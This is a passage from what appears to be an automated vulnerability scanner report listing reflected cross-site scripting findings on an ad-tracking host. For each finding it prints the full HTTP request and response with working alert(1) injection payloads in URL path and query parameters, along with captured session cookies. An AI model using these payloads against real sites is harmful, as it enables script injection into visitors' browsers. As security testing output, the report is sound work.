Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:41 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 330
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxisde44a"><script>alert(1)</script>c65a5f2b13a/923751385/x54/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.207. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1438791285@x54

Issue detail

The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d5159"><script>alert(1)</script>3c6e9657592 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /2/TRACK_Xaxis/1438791285@x54d5159"><script>alert(1)</script>3c6e9657592?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=&Section=Solutions HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:43 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 323
Content-Type: text/html

<A HREF="http://b3.mookie1.com/RealMedia/ads/click_lx.ads/TRACK_Xaxis/1271421515/x54d5159"><script>alert(1)</script>3c6e9657592/default/empty.gif/726348573830334f56626741436d4566?x" target="_top"><IMG
...[SNIP]...

1.208. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [Section parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1438791285@x54

Issue detail

The value of the Section request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload abb35'-alert(1)-'0f9fc7a2f26 was submitted in the Section parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1438791285@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=&Section=Solutionsabb35'-alert(1)-'0f9fc7a2f26 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:35 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2012
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...

imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=&Section=Solutionsabb35'-alert(1)-'0f9fc7a2f26';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsection='';
var page=''
...[SNIP]...

1.209. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [_RM_HTML_referer_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1438791285@x54

Issue detail

The value of the _RM_HTML_referer_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 10a6b'-alert(1)-'1de419fd19d was submitted in the _RM_HTML_referer_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1438791285@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=10a6b'-alert(1)-'1de419fd19d&Section=Solutions HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:31 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2012
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
ument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=10a6b'-alert(1)-'1de419fd19d&Section=Solutions';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section='';
var subsectio
...[SNIP]...

1.210. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [_RM_HTML_title_ parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1438791285@x54

Issue detail

The value of the _RM_HTML_title_ request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fddaf'-alert(1)-'f9b6676c680 was submitted in the _RM_HTML_title_ parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1438791285@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxisfddaf'-alert(1)-'f9b6676c680&_RM_HTML_referer_=&Section=Solutions HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:27 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2068
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
contain 247SEO argument = "N" */
{
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxisfddaf'-alert(1)-'f9b6676c680&_RM_HTML_referer_=&Section=Solutions';
qs=qs.toLowerCase();

var xaxis_pairs=qs.split('&');
var ZAP_url='//t.mookie1.com/t/v1/event?migClientId=3305&migAction=';
var xaxis_page='';

var section
...[SNIP]...

1.211. http://b3.mookie1.com/2/TRACK_Xaxis/1438791285@x54 [name of an arbitrarily supplied request parameter]

Summary

Severity:   High
Confidence:   Certain
Host:   http://b3.mookie1.com
Path:   /2/TRACK_Xaxis/1438791285@x54

Issue detail

The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 371c0'-alert(1)-'939e61e8ef5 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /2/TRACK_Xaxis/1438791285@x54?&_RM_HTML_url_=http%3A//www.xaxis.com/uk/solutions&_RM_HTML_title_=Solutions%20-%20Xaxis&_RM_HTML_referer_=&Section=Solutions&371c0'-alert(1)-'939e61e8ef5=1 HTTP/1.1
Host: b3.mookie1.com
Proxy-Connection: keep-alive
Referer: http://www.xaxis.com/uk/solutions
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: OAX=rcHW803OVbgACmEf; RMFL=011QNP3MU107OK; Motorola=247B3; Purolator=247B3; RMFM=011QYTJMR10I1k|U10TqE; NXCLICK2=011QYTJMNX_TRACK_Motorola/BK/BlueKaiTechLovers_NX_NonSecure!y!B3!TqE!MP9; NSC_o4efm_qppm_iuuq=ffffffff09419e9345525d5f4f58455e445a4a423660; id=2814750682866683; session=1309206190|1309206399

Response

HTTP/1.1 200 OK
Date: Mon, 27 Jun 2011 20:27:39 GMT
Server: Apache/2.2.3 (Red Hat)
P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml"
Content-Length: 2015
Content-Type: text/html

// Start DI Tracking Code for HEAD section
var refr=escape(document.referrer); /* get the http referer and encode it */
var dom=location.hostname; /* get the host domain */
var stURL="http://dna3.m
...[SNIP]...
imageTR = new Image();
imageTR.src = stURL;
}

// Push to ZAP
var qs='&_RM_HTML_url_=http%3A//ww